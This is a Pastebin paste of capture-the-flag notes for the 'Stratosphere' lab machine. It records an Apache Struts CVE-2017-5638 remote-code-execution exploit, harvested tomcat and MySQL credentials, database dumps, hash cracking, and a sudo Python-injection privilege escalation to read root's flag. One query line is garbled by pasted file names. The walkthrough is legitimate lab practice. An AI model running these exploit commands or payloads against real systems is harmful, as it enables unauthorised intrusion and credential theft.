Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- nmap:
- 22
- 80
- 8080
- -> /Monitoring/
- Checking: python struts-pwn.py --check --url http://stratosphere:8080/Monitoring/
- Exploit: python struts-pwn.py --url http://stratosphere:8080/Monitoring/ -c 'ls'
- CVE 2017-5638
- db_connect in tomcat folder (www)
- user=ssn_admin
- pass=AWs64@on*&
- /etc/tomcat/tomcat-users.xml:
- <user username="teampwner" password="cd@6sY{f^+kZV8J!+o*t|<fpNy]F_(Y$" roles="manager-gui,admin-gui" />
- root@kali:~/stratosphere# ./pwn.sh 'echo "SHOW DATABASES" | mysql -u admin -padmin'
- echo "SHOW DATABASES" | mysql -u admin -padmin
- [*] URL: http://stratosphere:8080/Monitoring/
- [*] CMD: echo "SHOW DATABASES" | mysql -u admin -padmin
- Database
- information_schema
- users
- root@kali:~/stratosphere# ./pwn.sh 'echo "use users; show tables;" | mysql -u admin -padmin'
- echo "use users; show tables;" | mysql -u admin -padmin
- [*] URL: http://stratosphere:8080/Monitoring/
- [*] CMD: echo "use users; show tables;" | mysql -u admin -padmin
- Tables_in_users
- accounts
- root@kali:~/stratosphere# ./pwn.sh 'echo "use users; select * from accounts;" | mysql -u admin -padmin'
- echo "use users; select gobuster.sh LinEnum.sh nc.sh nikto.sh pwn.sh rev.sh stratosphere_8080_gobust.txt stratosphere_gobust.txt stratosphere_monitoring_8080_nikto.txt stratosphere_nikto_80.txt stratosphere.txt.gnmap stratosphere.txt.nmap stratosphere.txt.xml stratosphese.txt.gnmap stratosphese.txt.nmap stratosphese.txt.xml struts-pwn.py webserver.sh wordlists from accounts;" | mysql -u admin -padmin
- [*] URL: http://stratosphere:8080/Monitoring/
- [*] CMD: echo "use users; select * from accounts;" | mysql -u admin -padmin
- fullName password username
- Richard F. Smith 9tc*rhKuG5TyXvUJOrE^5CK7k richard
- root@kali:~/stratosphere# ./pwn.sh 'echo "use users; describe accounts;" | mysql -u admin -padmin'
- echo "use users; describe accounts;" | mysql -u admin -padmin
- [*] URL: http://stratosphere:8080/Monitoring/
- [*] CMD: echo "use users; describe accounts;" | mysql -u admin -padmin
- Field Type Null Key Default Extra
- fullName varchar(45) YES NULL
- password varchar(30) YES NULL
- username varchar(20) YES NULL
- Use password to SSH (user richard)
- Run sudo -l /usr/bin/python3 /home/richard/test.py
- 5af003e100c80923ec04d65933d382cb : kaybboo!
- d24f6fb449855ff42344feff18ee2819033529ff : ninjaabisshinobi
- 91ae5fc9ecbca9d346225063f23d2bd9 : legend72
- 9efebee84ba0c5e030147cfd1660f5f2850883615d444ceecf50896aae083ead798d13584f52df0179df0200a3e1a122aa738beff263b49d2443738eba41c943
- ../run/john /home/hendrik/blake.txt --format=Raw-Blake2 --fork=8 --wordlist=/home/hendrik/rockyou.txt
- ^^^^^^^^^^^^^^ Rabbit hole but interesting
- echo '__import__("os").system("cat /root/root.txt")' | sudo /usr/bin/python2.7 /home/richard/test.py
Add Comment
Please, Sign In to add comment